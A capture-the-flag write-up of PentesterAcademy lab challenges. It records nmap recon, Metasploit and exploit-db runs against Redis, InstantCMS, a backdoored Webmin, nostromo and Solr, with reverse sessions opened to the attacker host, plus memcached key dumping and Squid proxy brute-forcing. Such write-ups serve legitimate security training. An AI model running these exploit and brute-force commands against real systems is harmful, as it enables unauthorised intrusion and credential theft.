Thanks to my early return from an overseas excercise, I’m stuck at home for two weeks. As such, I figured I might as well take a swing at the free CTF put on by PentesterAcademy, ctf.live.
- Vulnerable Database
- Vulnerable CMS
- Backdoored System Manager Tool
- Vulnerable Web Server
- Vulnerable Search Platform
Metasploit
Presumably, all of these challenges involve the use of capabilities provided inside of the Metasploit framework.
Vulnerable Database
The target server is running an outdated database server that is vulnerable to a publicly known vulnerability. While making some configuration changes, by mistake the admin has exposed this database to the external machines. In this challenge, the attacker has to fingerprint the database and exploit it using the appropriate Metasploit module.
Easy enough. My methodology going in will be to banner-grab the database server using nmap, then use searchsploit to find the relevant module. From there, I’ll pick an appropriate payload to find the flag on the box.
root@attackdefense:~# nmap -sV 192.8.72.3
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-06 23:01 IST
Nmap scan report for target-1 (192.8.72.3)
Host is up (0.000014s latency).
All 1000 scanned ports on target-1 (192.8.72.3) are closed
MAC Address: 02:42:C0:08:48:03 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.71 seconds
Well, that’s unfortunate. It seems every port is closed. The detail oriented, however, will recall that nmap only scans the 1000 most frequently seen ports by default. Since the host did respond to an ICMP ping, it is incredibly unlikely that it is listening on no ports, so I told NMAP to scan all ports (including 0).
root@attackdefense:~# nmap -sV 192.8.72.3 -p 0-65535
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-06 23:01 IST
Nmap scan report for target-1 (192.8.72.3)
Host is up (0.000015s latency).
Not shown: 65535 closed ports
PORT STATE SERVICE VERSION
6379/tcp open redis Redis key-value store 5.0.8
MAC Address: 02:42:C0:08:48:03 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.08 seconds
That’s more like it.
msf5 > search Redis
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/gather/ibm_bigfix_sites_packages_enum 2019-03-18 normal No IBM BigFix Relay Server Sites and Package Enum
1 auxiliary/scanner/redis/file_upload 2015-11-11 normal No Redis File Upload
2 auxiliary/scanner/redis/redis_login normal No Redis Login Utility
3 auxiliary/scanner/redis/redis_server normal No Redis Command Execute Scanner
4 exploit/linux/redis/redis_unauth_exec 2018-11-13 good No Redis Unauthenticated Code Execution
...
Using the exploit/linux/redis/redis_unauth_exec module, and the default meterpreter payload, getting the flag is as easy as setting the right options and hitting run.
msf5 exploit(linux/redis/redis_unauth_exec) > set lhost 192.8.72.2
lhost => 192.8.72.2
msf5 exploit(linux/redis/redis_unauth_exec) > set srvhost 192.8.72.2
srvhost => 192.8.72.2
msf5 exploit(linux/redis/redis_unauth_exec) > run
...
meterpreter > ls
Listing: /root
==============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100644/rw-r--r-- 3106 fil 2020-04-02 22:22:21 +0530 .bashrc
40700/rwx------ 4096 dir 2020-04-02 22:22:37 +0530 .cache
100644/rw-r--r-- 148 fil 2020-04-02 22:22:21 +0530 .profile
100644/rw-r--r-- 33 fil 2020-04-02 22:22:37 +0530 flag
100644/rw-r--r-- 46808 fil 2020-04-06 23:11:22 +0530 xbsc.so
meterpreter > cat flag
829ea1f5a92580f0484cd32a6ef09d25
Vulnerable CMS
The target machine is running an outdated Content Management System (CMS) which is vulnerable to a publicly known vulnerability. In this challenge, the attacker has to fingerprint the CMS and exploit it using the appropriate Metasploit module.
Same as before, my methodology will be to conduct reconnaissance, find and weaponize an exploit, and deliver a payload. This time, though, I needed to leverage nmap’s scripting engine, using the -A flag to specify to use the default scripts and also perform a banner grab.
root@attackdefense:~# nmap -A 192.7.230.3
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-06 23:16 IST
Stats: 0:00:18 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Nmap scan report for target-1 (192.7.230.3)
Host is up (0.000087s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-generator: InstantCMS - www.instantcms.ru
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: InstantCMS 1.6.2
...
Booting up the Metasploit console, it’s trivial to find the right exploit.
msf5 > search InstantCMS
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/instantcms_exec 2013-06-26 excellent Yes InstantCMS 1.6 Remote PHP Code Execution
As before, setting the appropriate options and firing it off is enough to get the flag.
msf5 exploit(unix/webapp/instantcms_exec) > set rhost 192.7.230.3
rhost => 192.7.230.3
msf5 exploit(unix/webapp/instantcms_exec) > set lhost 192.7.230.2
lhost => 192.7.230.2
msf5 exploit(unix/webapp/instantcms_exec) > run
[*] Started reverse TCP handler on 192.7.230.2:4444
[*] Executing payload...
[*] Sending stage (38288 bytes) to 192.7.230.3
[*] Meterpreter session 1 opened (192.7.230.2:4444 -> 192.7.230.3:42126) at 2020-04-06 23:18:53 +0530
meterpreter > ls
Listing: /var/www/html
======================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 517 fil 2010-04-30 23:46:26 +0530 .htaccess
100644/rw-r--r-- 33 fil 2020-04-01 16:01:06 +0530 THIS_IS_FLAG31231234555
40777/rwxrwxrwx 4096 dir 2010-05-16 01:12:44 +0530 admin
40777/rwxrwxrwx 4096 dir 2010-05-16 01:12:44 +0530 backups
40777/rwxrwxrwx 4096 dir 2020-03-11 21:16:09 +0530 cache
40777/rwxrwxrwx 4096 dir 2010-07-17 20:17:26 +0530 components
40777/rwxrwxrwx 4096 dir 2010-05-17 18:15:34 +0530 core
40777/rwxrwxrwx 4096 dir 2010-05-16 01:12:46 +0530 filters
40777/rwxrwxrwx 4096 dir 2010-05-16 01:12:46 +0530 images
40777/rwxrwxrwx 4096 dir 2020-03-11 21:15:22 +0530 includes
100777/rwxrwxrwx 5719 fil 2010-05-06 19:18:54 +0530 index.php
40777/rwxrwxrwx 4096 dir 2010-05-16 01:17:44 +0530 install_
40777/rwxrwxrwx 4096 dir 2010-07-17 20:18:00 +0530 languages
100777/rwxrwxrwx 40191 fil 2010-04-23 20:21:10 +0530 license.rus.utf.txt
100777/rwxrwxrwx 23209 fil 2010-04-23 20:21:12 +0530 license.rus.win.txt
100777/rwxrwxrwx 17987 fil 2010-04-23 20:21:10 +0530 license.txt
40777/rwxrwxrwx 4096 dir 2010-05-16 01:12:46 +0530 migrate_
40777/rwxrwxrwx 4096 dir 2010-05-16 01:12:46 +0530 modules
40777/rwxrwxrwx 4096 dir 2010-05-16 01:12:46 +0530 plugins
100777/rwxrwxrwx 1549 fil 2010-04-23 20:21:12 +0530 readme.txt
40777/rwxrwxrwx 4096 dir 2010-07-17 20:18:28 +0530 templates
40777/rwxrwxrwx 4096 dir 2010-05-16 01:12:46 +0530 upload
100777/rwxrwxrwx 10726 fil 2010-05-16 01:17:44 +0530 url_rewrite.php
100777/rwxrwxrwx 51376 fil 2010-05-16 01:17:44 +0530 version_log.txt
meterpreter > cat THIS_IS_FLAG31231234555
6cc438c37e36a57afc61279167ebeb82
Backdoored System Manager Tool
The target server is running a system management tool that contains a publicly known backdoor. In this challenge, the attacker has to fingerprint the system management tool and exploit it using the appropriate Metasploit module.
Just as you might expect by now, I’ll be conducting reconaissance, finding and weaponizing an exploit, then delivering a payload. As before, I’ll utilize the nmap scripting engine to fingerprint the tool. One addition is the -F flag, which tells nmap to only scan the top 100 ports, instead of the default top 1000.
root@attackdefense:~# nmap -AF 192.102.234.3
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-06 23:23 IST
Nmap scan report for target-1 (192.102.234.3)
Host is up (0.000056s latency).
Not shown: 99 closed ports
PORT STATE SERVICE VERSION
10000/tcp open http MiniServ 1.920 (Webmin httpd)
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Login to Webmin
Searching for Webmin exploits inside the Metasploit framework finds us one backdoor exploit from 2019.
msf5 > search webmin
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/webmin/edit_html_fileaccess 2012-09-06 normal No Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access
1 auxiliary/admin/webmin/file_disclosure 2006-06-30 normal No Webmin File Disclosure
2 exploit/linux/http/webmin_backdoor 2019-08-10 excellent Yes Webmin password_change.cgi Backdoor
...
Using this exploit, we get a partially-interactive shell, which I then upgrade using the Python pty method.
msf5 exploit(linux/http/webmin_backdoor) > set lhost 192.102.234.2
lhost => 192.102.234.2
msf5 exploit(linux/http/webmin_backdoor) > set srvhost 192.102.234.2
srvhost => 192.102.234.2
msf5 exploit(linux/http/webmin_backdoor) > run
...
id
uid=0(root) gid=0(root) groups=0(root)
python -c 'import pty; pty.spawn("/bin/bash")'
root@victim-1:/webmin/acl#
Using find, I quickly discover where our flag is.
root@victim-1:/webmin/acl# find / -xdev -name *flag
/root/flag
root@victim-1:/webmin/acl# cat /root/flag
b3be8fa61b04f25ae1b36da42f37269a
Vulnerable Web Server
The target server is running an outdated web server that is vulnerable to a publicly known vulnerability. In this challenge, the attacker has to fingerprint the webserver and then exploit it using the appropriate Metasploit module.
For this challenge, I shouldn’t need to do any script scanning, since I’ll be directly exploiting the server itself.
root@attackdefense:~# nmap 192.38.176.3 -sV
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-06 23:46 IST
Nmap scan report for target-1 (192.38.176.3)
Host is up (0.000015s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http nostromo 1.9.5
Metasploit has the following exploit.
msf5 > search nostromo
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/nostromo_code_exec 2019-10-20 good Yes Nostromo Directory Traversal Remote Command Execution
Running the exploit, upgrading the shell, finding the flag and reading it is fairly straightforward.
python -c 'import pty; pty.spawn("/bin/bash")'
admin@victim-1:/bin$ find / -xdev -name *flag
find / -xdev -name *flag
find: '/var/cache/apt/archives/partial': Permission denied
find: '/var/cache/ldconfig': Permission denied
find: '/var/lib/apt/lists/partial': Permission denied
find: '/root': Permission denied
find: '/etc/ssl/private': Permission denied
/flag
admin@victim-1:/bin$ cat /flag
cat /flag
c3b940013b8b52573f4615d5236bbe3d
Vulnerable Search Platform
The target server is running an outdated enterprise search platform that is vulnerable to a publicly known vulnerability. In this challenge, the attacker has to fingerprint the search platform and exploit it using the appropriate Metasploit module.
As always, I’ll be using nmap for recon, searching the Metasploit framework for an exploit, then using whatever the exploit’s standard payload is.
root@attackdefense:~# nmap -sV 192.38.186.3 -p 0-65535
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-06 23:54 IST
Stats: 0:00:08 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Nmap scan report for target-1 (192.38.186.3)
Host is up (0.000014s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
8983/tcp open http Apache Solr
18983/tcp open rmiregistry Java RMI
41399/tcp open rmiregistry Java RMI
Now, to find an exploit.
root@attackdefense:~# searchsploit Solr
--------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------- ----------------------------------------
Apache Solr 7.0.1 - XML External Entity Expansion / Remote Code Execution | exploits/xml/webapps/43009.txt
Apache Solr 8.2.0 - Remote Code Execution | exploits/java/webapps/47572.py
Solr 3.5.0 - Arbitrary Data Deletion | exploits/java/webapps/39418.txt
--------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
Note that this exploit is not inside of the metasploit framework. Using this exploit directly from the command line, we can find and read the flag.
root@attackdefense:~# python3 /usr/share/exploitdb/exploits/java/webapps/47572.py 192.38.186.3 8983 "find / -xdev -name *flag"
...
Init node db Successfully, exec command=find / -xdev -name *flag
RCE Successfully @Apache Solr node db
/flag
...
root@attackdefense:~# python3 /usr/share/exploitdb/exploits/java/webapps/47572.py 192.38.186.3 8983 "cat /flag"
...
Init node db Successfully, exec command=cat /flag
RCE Successfully @Apache Solr node db
1ba0fa89d14e9b1e74a88160dc0d85af
...
Network
All of these challenges involve the indirect exploitation of network facing servers. Sounds fun enough.
Caching Server
Over the past years, caching servers have played a crucial role in speeding up the content served by the webservers. In most cases, caching servers are deployed on the internal network and are not protected with authentication. In this challenge, the attacker has managed to sneak into the internal network and can interact with the caching server. Please answer the following questions:
- How many key-value pairs are stored on the caching server?
- Find the value stored in key “api-key” on the caching server.
- Find the name of the key which is present in the warm cache of the caching server.
Off-hand, the references to key-value pairs and different layers of cache make me think that this challenge uses Redis or Memcached, but I will use nmap to confirm this hypothesis.
root@attackdefense:~# nmap -sV 192.179.78.3 -p 0-65535
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-07 01:30 IST
Nmap scan report for target-1 (192.179.78.3)
Host is up (0.000014s latency).
Not shown: 65535 closed ports
PORT STATE SERVICE VERSION
11211/tcp open memcached Memcached 1.5.12 (uptime 204 seconds)
Memcached it is. Luckily for us, libmemcached is installed, as discovered using apropos.
root@attackdefense:~# apropos memcached
memcached (1) - high-performance memory object caching system
memcaslap (1) - libmemcached Documentation
memccapable (1) - libmemcached Documentation
memccat (1) - libmemcached Documentation
memccp (1) - libmemcached Documentation
memcdump (1) - libmemcached Documentation
memcerror (1) - libmemcached Documentation
memcexist (1) - libmemcached Documentation
memcflush (1) - libmemcached Documentation
memcparse (1) - libmemcached Documentation
memcping (1) - libmemcached Documentation
memcrm (1) - libmemcached Documentation
memcslap (1) - libmemcached Documentation
memcstat (1) - libmemcached Documentation
memctouch (1) - libmemcached Documentation
Using memcstat, getting the total number of pairs is simple.
oot@attackdefense:~# memcstat --servers=192.179.78.3
Server: 192.179.78.3 (11211)
pid: 7
uptime: 274
time: 1586203318
version: 1.5.12
libevent: 2.0.21-stable
...
curr_items: 15
total_items: 42
...
Note that while you might think that total_items would be the correct answer, only the items in curr_items are actuall stored on the server right now.
Moving on, I used memccat to get the value for the api-key key.
root@attackdefense:~# memccat --servers=192.179.78.3 api-key
0c50e7e8b66421217aa39e2286c2d5df
Now, the last question is slightly more tricky. In order to determine which key was in the warm-cache, I connected to the memcached server via telnet and set the timeout of every value to 20 seconds, giving whatever script was keeping the target value warm plenty of time to re-query.
set userCount 0 15 1
95
STORED
set email 0 15 23
admin@recon-badge.local
STORED
...
After waiting about a minute, only one key remained:
stats cachedump 1 0
ITEM userCount [2 b; 0 s]
END
get userCount
VALUE userCount 4 2
95
Counter to the prompt, 95 is the answer to the question, not the name of the key.
Abusing Proxy Server
IP whitelisting is a common method of limiting access only to trusted users. In this challenge, there are two target machines (machine A and machine B). The attacker is provided with phished SSH credentials of machine B. But, the SSH server is configured only to allow sessions from a specific machine (i.e. machine A). Objective: You have to SSH into the machine B and retrieve the flag!
Also included further down in the prompt is the following information:
You can use corkscrew tool (available on the attacker machine) to solve it
Please use Nmap's proxy brute force script with default Nmap dictionaries (given below):
Username wordlist: /usr/share/nmap/nselib/data/usernames.lst
Password wordlist: /usr/share/nmap/nselib/data/passwords.lst
First up, let’s figure out what kind of proxy is running on machine A.
root@attackdefense:~# nmap -A 192.38.44.3 | tee target-a.txt
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-07 03:03 IST
Stats: 0:00:23 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Nmap scan report for target-1 (192.38.44.3)
Host is up (0.000051s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
3128/tcp open http-proxy Squid http proxy 3.5.12
Now, using the hinted at http-proxy-brute nmap script, let’s brute force that proxy server.
root@attackdefense:~# nmap --script=http-proxy-brute -p 3128 192.38.44.3
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-07 03:07 IST
PORT STATE SERVICE
3128/tcp open squid-http
| http-proxy-brute:
| Accounts:
| root:hello! - Valid credentials
|_ Statistics: Performed 49698 guesses in 38 seconds, average tps: 1644.1
MAC Address: 02:42:C0:26:2C:03 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 39.16 seconds
Now, given that, I’ll use corkscrew to SSH to machine B via machine A. Thanks to the following example in the manpage for corkscrew, this is easy.
EXAMPLES
The common usage of corkscrew is to put the following line in
~/.ssh/ssh_config:
ProxyCommand corkscrew proxy proxyport %h %p [<path to auth_file>]
So, I did the following:
root@attackdefense:~# echo "root:hello!" > authfile
root@attackdefense:~# echo "Host *" >> /root/.ssh/ssh_config
root@attackdefense:~# echo "ProxyCommand corkscrew 192.38.44.3 3128 %h %p /root/authfile" >> /root/.ssh/ssh_config
root@attackdefense:~# ssh 192.38.44.4 -F .ssh/ssh_config
Proxy could not open connection to 192.38.44.4: Service Unavailable
kex_exchange_identification: Connection closed by remote host
Weird. I guess I should probably make sure that the port I’m trying to connect to is actually open.
root@attackdefense:~# nmap 192.38.44.4 -p 0-65535 -sV
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-07 03:17 IST
Nmap scan report for target-2 (192.38.44.4)
Host is up (0.000015s latency).
Not shown: 65535 closed ports
PORT STATE SERVICE VERSION
4554/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.5 (Ubuntu Linux; protocol 2.0)
Okay, so they set SSH to listen on port 4554. Easy enough:
root@attackdefense:~# ssh 192.38.44.4 -F .ssh/ssh_config -p 4554
root@192.38.44.4's password:
Welcome to Ubuntu 16.04.5 LTS (GNU/Linux 4.15.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
Last login: Mon Apr 6 21:46:26 2020 from 192.38.44.3
root@victim-1:~# ls
FLAG
root@victim-1:~# cat FLAG
1678C22AA29A611919DADE0E8B1A1527
Conclusion
While that’s all I had time to do in a day, there’s a bunch more challenges up on the site. This CTF, which it seems is based on the Attack-Defense CTF I beta tested, is well-built and has minimal issues. Thanks to the in-browser VMs, you could concievably do this on any network that lets you browse the internet, and on any device that can run a web browser, which is always a plus. My impression of Pentester Academy only goes up as I interact with more of their products. Who knows, if I decide I want to move into the offensive security space I may purchase a subscription.